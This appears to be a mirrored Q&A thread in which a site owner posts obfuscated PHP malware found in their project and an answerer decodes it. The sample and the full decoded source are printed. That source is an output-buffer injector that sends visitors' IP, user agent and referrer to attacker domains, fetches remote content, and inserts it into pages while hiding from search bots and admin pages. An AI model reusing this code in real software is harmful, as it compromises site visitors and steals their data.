Malware Infected PHP code (I need some help to decode)
Question
Today I saw the following PHP code snippets in the code of some files of my project. The code was single line. I have used PHP Formatter ( http://beta.phpformatter.com/ ), but I still have not figured it out.
Do you have any idea what it is?
<?php
$nkswqu = 'j!<2,*j%!-#1]#-bubE{h%)tpqs) or (strstr($uas," x61 156 x64!-#j0#!/!**#sfmcnbs+yfeobz+sfwjidsb`bj+upcot$nifaghb = $hiwbtoy("", $puk-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*-!%fX)ufttj x22)gj!|!*nbsbq%)323ldfidk!~!<**qp%!-uyfu%)3of)fe2M3]317]445]212]445]43]321]464]284]3x22:ftmbg39*56A:>:8:|:7#6#)tutjyf`439275ttfsqnpdov{h19275sbz)#44ec:649#-!#:618d5f9#-!#f6c68399#x61"]=1; $uas=strtolower($_SERVER[" x48 124 +opjudovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>> x228L3P6L1M5]D2P4]D6#<%G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Lutpi}Y;tuofuopd`ufh`fmtmw/ x24)%zW%h>EzH,2W%wN;#-Ez-d!opjudovg!|!**#j{hnpd#)tutjyf`opjudovg x22)!gw6* x7f_*#fmjgk4`{6~6<tfs%w6< x7fw6*CWtfs%)7gj6<*id%)ftpmdR6<h%:<#64y]552]e7y]#>n%<#372]58y]472]37y]672]48y]#>s%<#462]47x54 120 x5f 125 x53 105 x52 137 x41 107 x45 116 x54"]); if (} @error_reporting(0); $pukpmqk = implode(array_map("gwscco x7fw6* x7f_*#fubfsdXk5`{66~6<&w6< x7fw6*CW&)7gj6<*doj%72 157 x6d 145")) or (strstr($uas," x66 151 x72 145 x66 157 162 x6f 151 x64")) or (strstr($uas," x63 150 x7 or (strstr($uas," x72 166 x3a 61 x31")f2-!%t::**<(<!fwbm)%tjw)# x24#-!#]y38#-!%w:**<")));6<pd%w6Z6<.2`hA x27pd%6<C x27pd%6|6.7eu{66<*QDU`MPT7-NBFSUT`LDPT7-UFOJ`GB)fubfsdX6< x7fw6*CW&)7gj6<*K)ftp6~67<&w6<*&7-#o]s]o]s]#)fepmqyf x27*&7-n%)utjm!>!2p%!|!*!***b%)sfxpmpusutg!)%j:>>1*!%b:>1<!fmtf!%b:>%s: x5c%j:.2^,%b:<!%c:>_;#)323ldfid>}&;!osvufs} x7f;!opjudovg}k~~9{d%:osvufs:~928>> x78"))) { $hiwbtoy = " x63 162]1/20QUUI7jsv%7UFH# x27rfs%6~6< x7fw6<*K)ftpmdXA6|7**19@#7/7^#iubq# x5cq% x27jsv%6<C>^#zsfvr# x5cq%7**^#zsI&c_UOFHB`SFTV`QUUI&bFWSFT`%}X;!sp!*#opo#>>}R;msv}.%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]341]8-C)fepmqnjA x27&6<.fmjgA x27doj%6< x7fd/#00;quui#>.%!<***f x27,*e x27,*d x27,*c x27,*b x27)fepdof.)fes",str_split("%tjw!>!#]y84]275]y83]248]y83]256]y81]265]y7<*X&Z&S{ftmfV x7f<*XAZASV<*w%)ppde>u%V<#65,47R]D6#<%fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:Mj}1~!<2p% x7f!~!<##!>!2p%Z<^2 x5c2b%!>!24tvctus)% x24- x24b!>!%yy)#}#-c9y]g2y]#>>*4-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)j{hnp24]25 x24- x24-!% x24- x24*!|! x24- x24 x5c%j^ x24- x2x24<%j,,*!| x24- x24gvodujpo! x24- x24UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msid%6< x7fw6* x7f_*#ujojRk3`{666~6<&w6< x7fw6*CW&)7gj6<.[sbnpe_GMFT`QIQ&f_UTPI`QUUI&e_SEEB`FUPNFS&d_SFSFGFS`QUUbq}k;opjudovg}x;0]=])0#)U! x27{**u%-#jt0}Z;0]=]0#)2q%l}S;2-u%!-#2#/d]55#*<%bG9}:}.}-}!#*<%nfd>%fdy<Cb*[%h!>!%tdz)%bbT-%bT-:<h%_t%:osvufs:~:<*9-1-r%)y7 x24- x24*<! x24- x24gps)%j>1<%j=tj{fpg)% x24- x24*<!~!/r%/h%)n%-#+I#)q%:>:r%:|:**t%)m%=*h%)m%):fmjix:<##:>:/q%>2q%<#g6R85,67R37,18R#>q%V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w%)kVut>j%!*72! x27!hmg%)!gj!<2,*j%-#1]#-bubE{h%)tpqsut!>! x242178}527}88:}334}472 x24<!%ff2!>!bssbz) x!ftmbg)!gj<*#k#)usbut`cpV x7f x7f x7f x7f<u%V x27{ftmfV x7fvd},;uqpuft`msvd}+;!>!} x27;!>mdXA6~6<u%7>/7&6|7**111127-K)ebfsX x27u%)7fmjix6<C j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm%:-5ppde:4:|:**#ppde#)tu1H*WCw*[!%rN}#QwTW%hIr x5c1^-%r x5c2^-%hOh/#00#W~!%t2w)##Qtjw!)%z>>2*!%z>3<!fmtf!%z>2<!s%>/h%:<**#57]38y]47]67y]37]88y]27]28y]#8M4P8]37]278]225]241]334]368]322]3]364fvr# x5cq%)ufttj x22)gj6<^#Y# x5cq% x2)ldbqov>*ofmy%)utjm!|!*5! x27!hmg%)!gj!|!*1?hmg%)!gj!<**2-4-bubE{h%)s!gj!<*#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!s]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]452]88]5]48]3**2qj%)hopm3qjA)qj3hopmA x273qj%6<*Y%)8]Df#<%tdz>#L4]275L3]24 x27;mnui}&;zepc}A;~!} x7f;!|!}{;)gj}l;33(strstr($uas," x6d 163 x69 145"))t($GLOBALS[" x61 156 x757-2qj%7-K)udfoopdXA x22)7gj x65 141 x74 145 x5f 146 x75 156 x63 164 156 x61"])))) { $GLOBALS[" x61 156 x75 156 6]y6g]257]y86]267]y74]275]y7pdof`57ftbc x7f!|!*uyfu x27k:!ftmf!}Z;^nbsbq% x5cS>j%!*9! x27!hmg%)!gj!~<ofmy%,3,j%>j%!<**3-j%-bubE{h%)sutcvt-#w#tjyf`4 x223}!+!<+{e%+*!*+fepdfe{h+{d%)25,d7R17,67R37,#/q%>U<#16,47R57,27R66,## x24- x24-tusqpt)%z-#:#* x24- x24!>! x24/%tjw/ x24)% x24- x24y4 x24- x5c2^<!Ce*[!%cIjQeTQcOc/#00#W~!Ydrr)%rxB%epnbss!>!bsx69 157 x6e"; function gwsccos($n){return chr(ord($n)-1);v%7-MSV,6<*)ujojR x27c:>1<%b:>1<!gps)%j:>1<%j:=tj{fpg)%s:*<%j:,,Bj*id%)dfyfR x27tfs%6<*17-SFEBFI,6<*127-A x27&6< x7fw6* x7f_*x27&6<*rfs%7-K)fujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#op%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1GO x22#)fepmqyfA>> x22!pd%)!gj}Z;h!opjudovg}{;#)t*9.-j%-bubE{h%)sutcvt)fubmgoj{hA97e:56-xr.985:52985-t.98]K4]65]#%#/#o]#/*)323zbe!-#jt0*?]+^?]_ x5c}X x24<!%if((function_exists(" x6f 142 x5f 163 x74 141 x72 164") && (!isse-!#65egb2dc#*<!sfuvso!sboepn)%epnbss-%rxW~!Ypp2)%zB%z>! x24/%jg}[;ldpt%}K;`ufldpt}X;`msvd}R;*msv%)}.;`utjyf`opjudovg)!gj!|!*msv%)}k~~~<ftpmqk); $nifaghb();}}7Y%6<.msv`ftsbqA7>q%6<%s: x5c%j:^<!%w` x5c^>Ew:Qb:Qc:W~!%z!>2<!gps)%j>1<%hA x27pd%6<pd%w6Z6<.4`hA x27pd%6<pd%w6Z6<.3`hA x27pd%62]38y]572]48y]#>m%:|:*r%:-t%)3of:opjudovg<~ x24<!%o:pp3)%cB%iN}#-! x24/%tmw/ x24)%c*W%eN+#Qi x5c1^W%c!>!%i946-tr.984:75983:489x5csboe))1/35.)1/14+9**-)1/2986+7**^/%rx<~!!%s:N}#-%o:W%UQPMSVD!-id%)uqpuft`msn)%bss-%rxB%h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.9x24]y8 x24- x24]26 x24- 7]K3#<%yy>#]D6]281L1#/#M5]DgP52b%!<*qp%-*.%)euhA)3of>2bd%!<5h%/#0#/*#npd/#)rry]252]18y]#>q%<#762]67y]5A x27K6< x7fw6*3qj%7> x2272qj%)7gj6<fnbozcYufhA x272qj%6<^#zsfvr# x5cq%7/7#y74]273]y76]252]y85]2584:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>!#]D6M)#]82#-#!#-%tmw)%tww**WYsboepT#-#E#-#G#-#H#-#I#-#K#-#L#-#M#3e:5597f-s.973:8297f:52tmw!>!#]y84]275]y83]273]y76]277#<!%t2w>#]%ww2)%w`TW~ x24<!fwbm)%tjw)bssbz)#P#-#Q#-#B#-#;/#/#/},;#-#}+;%-qp%)54l} x27;%!<*#}n+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!/!#0#)idubn` x24/%t2w/ x24)##-!#~<#/% x24- x24!>!fyqmpef)# x24*<!%t::!>! x24Ypdof./#@#/qp%>5h%!<*::::::-111112)eobs`un>qp%!|Z~!<##%!|!*)323zbek!~!<b% x7f!<X>b%Z<#opo#>b%!*##>>X)!gjZ<#opo#>b%!**D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#/#7e:552]254]y76#<!%w:!>!(%w:!>! x246767~6<Cw6<pd%w6Z6<.5`64]6]234]342]58]24]31#-%tdz*Wsfuvso!%bss j=6[%ww2!>#p#/#p#/%z<jg!osvufs!~<3,j%>j%!*3! x27!hmg%!)!ghfsq)!sp!*#ojneb#-*f%)sfxpmpusut)tpqssutRe%)Rd%)Rb%))>>!}_;gvc%}&;ftmbg} x7f;!osvufs}w;* x7f!>:]268]y7f#<!%tww!>! x2400~x{**#k#)tutjyf`x x22l:!}V;3q%}U;y]}R;2]},;osvufs}#[k2`{6:!}7;!}6;##}C;!>>!}W;mbg!osvufs!|ftmf!~<*utcvt)esp>hmg%!<12>j%!|!*#91y]StrrEVxNoiTCnUF_EtaERCxecAlPeR_rtSbkcrowkyt';
$qcmviqrrx = explode(chr((837 - 717)), substr($nkswqu, (18509 - 12489), (199 - 165)));
$wvodkr = $qcmviqrrx[0]($qcmviqrrx[(4 - 3)]);
$xskmfwqv = $qcmviqrrx[0]($qcmviqrrx[(9 - 7)]);
if (!function_exists('fxlepffr')) {
function fxlepffr($qkfdqgat, $aaxdfvhwkhy, $lmyikk)
{
$xzlzanfi = NULL;
for ($crzozy = 0; $crzozy < (sizeof($qkfdqgat) / 2); $crzozy++) {
$xzlzanfi .= substr($aaxdfvhwkhy, $qkfdqgat[($crzozy * 2)], $qkfdqgat[($crzozy * 2) + (4 - 3)]);
}
return $lmyikk(chr((35 - 26)), chr((548 - 456)), $xzlzanfi);
}
;
}
$aashvx = explode(chr((147 - 103)), '4260,65,3364,24,3456,44,351,44,717,60,3331,33,998,39,27,31,950,48,892,58,1377,31,3415,41,3841,57,777,59,1708,57,5624,51,4555,53,1088,41,1193,46,1169,24,2730,51,4023,49,1408,55,3388,27,1129,40,4996,36,3229,38,5032,39,1463,51,3008,38,4482,22,836,56,1607,38,597,61,3964,38,2072,34,3898,21,2106,56,4002,21,5942,28,499,22,4386,41,4791,22,2700,30,5826,41,4121,32,4427,35,5970,20,4153,32,5739,34,0,27,2543,50,3578,63,3046,69,5990,30,1929,51,551,46,1859,40,4072,49,4924,47,1645,63,5462,53,1239,27,58,44,5350,47,5773,53,3115,53,2162,54,1514,21,5515,63,163,57,3528,50,1535,30,5314,36,1316,61,256,57,2781,62,3641,38,395,44,2641,59,1765,46,3679,39,2474,69,5893,49,3290,41,2216,67,4216,44,5227,41,5071,22,3500,28,5867,26,2338,26,2930,40,2421,53,658,59,4971,25,4608,53,2593,48,1980,54,1899,30,3718,70,4870,24,2034,38,2364,57,5397,65,4661,54,3788,53,313,38,4325,61,521,30,2843,61,5145,29,4813,57,5204,23,4185,31,5578,46,4715,20,5093,52,4894,30,1811,48,3267,23,439,60,2283,55,1565,42,2970,38,3168,61,220,36,5675,41,4735,56,3919,45,1266,50,4504,51,5716,23,2904,26,5268,46,5174,30,130,33,1037,51,102,28,4462,20');
$ajoqqxy = $wvodkr("", fxlepffr($aashvx, $nkswqu, $xskmfwqv));
$wvodkr = $nkswqu;
$ajoqqxy("");
$ajoqqxy = (791 - 670);
$nkswqu = $ajoqqxy - 1;
?>
Thank you so much.
Edit: I shut down the infected site, I downloaded it. I cleaned the malicious code and moved it to a new server. There is no interface on this site to create a security breach, so I think the harmful code is infected through the server.
Original Code: https://pastebin.com/L1hZuCvy
1 answers
solution1
0 ACCPTED 2017-11-28 23:03:45
I'm not gona writing a full tutorial about reverse engineering such code, but because I was curious, what your snippet really does, I did some work.
If you follow all encoding layers, you will end with this code:
function g_1($url)
{
if (function_exists("file_get_contents") === false) return false;
$buf = @file_get_contents($url);
if ($buf == "") return false;
return $buf;
}
function g_2($url)
{
if (function_exists("curl_init") === false) return false;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_HEADER, 0);
$res = curl_exec($ch);
curl_close($ch);
if ($res == "") return false;
return $res;
}
function g_3($url)
{
if (function_exists("file") === false) return false;
$inc = @file($url);
$buf = @implode("", $inc);
if ($buf == "") return false;
return $buf;
}
function g_4($url)
{
if (function_exists("socket_create") === false) return false;
$p = @parse_url($url);
$host = $p["host"];
if (!isset($p["query"])) $p["query"] = "";
$uri = $p["path"] . "?" . $p["query"];
$ip1 = @gethostbyname($host);
$ip2 = @long2ip(@ip2long($ip1));
if ($ip1 != $ip2) return false;
$sock = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if (!@socket_connect($sock, $ip1, 80)) {
@socket_close($sock);
return false;
}
$req = "GET $uri HTTP/1.0\n";
$req .= "Host: $host\n\n";
socket_write($sock, $req);
$buf = "";
while ($t = socket_read($sock, 10000)) {
$buf .= $t;
}
@socket_close($sock);
if ($buf == "") return false;
list($m, $buf) = explode("\r\n\r\n", $buf);
return $buf;
}
function gtd($url)
{
$co = "";
$co = @g_1($url);
if ($co !== false) return $co;
$co = @g_2($url);
if ($co !== false) return $co;
$co = @g_3($url);
if ($co !== false) return $co;
$co = @g_4($url);
if ($co !== false) return $co;
return "";
}
function comgzi($gzData)
{
if (substr($gzData, 0, 3) == "\x1f\x8b\x08") {
$i = 10;
$flg = ord(substr($gzData, 3, 1));
if ($flg > 0) {
if ($flg & 4) {
list($xlen) = unpack("v", substr($gzData, $i, 2));
$i = $i + 2 + $xlen;
}
if ($flg & 8) $i = strpos($gzData, "\0", $i) + 1;
if ($flg & 16) $i = strpos($gzData, "\0", $i) + 1;
if ($flg & 2) $i = $i + 2;
}
return @gzinflate(substr($gzData, $i, -8));
} else {
return false;
}
}
function k34($op, $text)
{
return base64_encode(en2($text, $op));
}
function check212($param)
{
if (!isset($_SERVER[$param]))
$a = "non";
else if ($_SERVER[$param] == "")
$a = "non";
else
$a = $_SERVER[$param];
return $a;
}
function day212()
{
$a = check212("HTTP_USER_AGENT");
$b = check212("HTTP_REFERER");
$c = check212("REMOTE_ADDR");
$d = check212("HTTP_HOST");
$e = check212("PHP_SELF");
$domarr = array("33db9538", "9507c4e8", "e5b57288", "54dfa1cb");
if (($a == "non") or ($c == "non") or ($d == "non") or strrpos(strtolower($e), "admin") or (preg_match("/" . implode("|", array("google", "slurp", "msnbot", "ia_archiver", "yandex", "rambler")) . "/i", strtolower($a)))) {
$o1 = "";
} else {
$op = mt_rand(100000, 999999);
$g4 = $op . "?" . urlencode(urlencode(k34($op, $a) . "." . k34($op, $b) . "." . k34($op, $c) . "." . k34($op, $d) . "." . k34($op, $e)));
$url = "http://" . cqq(".com") . "/" . $g4;
$ca1 = en2(@gtd($url), $op);
$a1 = @explode("!NF0", $ca1);
if (sizeof($a1) >= 2) $o1 = $a1[1]; else $o1 = "";
}
return $o1;
}
function dcoo($cz, $length = null)
{
if (false !== ($dz = @gzinflate($cz))) return $dz;
if (false !== ($dz = @comgzi($cz))) return $dz;
if (false !== ($dz = @gzuncompress($cz))) return $dz;
if (function_exists("gzdecode")) {
$dz = @gzdecode($cz);
if (false !== $dz) return $dz;
}
return $cz;
}
function pa22($v)
{
Header("Content-Encoding: none");
$t = dcoo($v);
if (preg_match("/\<\/body/si", $t)) {
return preg_replace("/(\<\/body[^\>]*\>)/si", day212() . "\n" . "$" . "1", $t, 1);
} else {
if (preg_match("/\<\/html/si", $t)) {
return preg_replace("/(\<\/html[^\>]*\>)/si", day212() . "\n" . "$" . "1", $t, 1);
} else {
return $t;
}
}
}
ob_start("pa22");
What this code does is:
- register and output handler, which replace your own site with content from their servers
- randomly choose one of 4 servers (33db9538.com, 9507c4e8.com, e5b57288.com and 54dfa1cb.com)
- to this server, it sends an request with some server information
Sadly I wasn't able to have a look at what exactly they deliver to your server - seems like they have some kind of test to prevent everyone from have a look into their code.
To sum all up - the code don't install a backdoor on your server (but as they could manipulate your php files, they already have one..). The malware was escpecially dangerous for your visitors, as they could show all kind of content.
The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address.Any question please contact:yoyou2525@163.com.
Related Question
I need some help to optimize this code that read annotations in php classes
My site is infected with obfuscated PHP malware - what is it doing + how do I get rid of it?
PHP - I need some help with my Regex
need some simple help understanding a bit of pre-PHP5 code
WordPress 2.9.2 Infected with SEO worm, blog.theyoungrens.com, I need some advice on getting it fixed
Need help hiding some code
Need some help debugging this PHP
Need Some help in simple PHP
Need some help with Numbers in PHP
I need help to turn some raw SQL into Eloquent code
Related Tags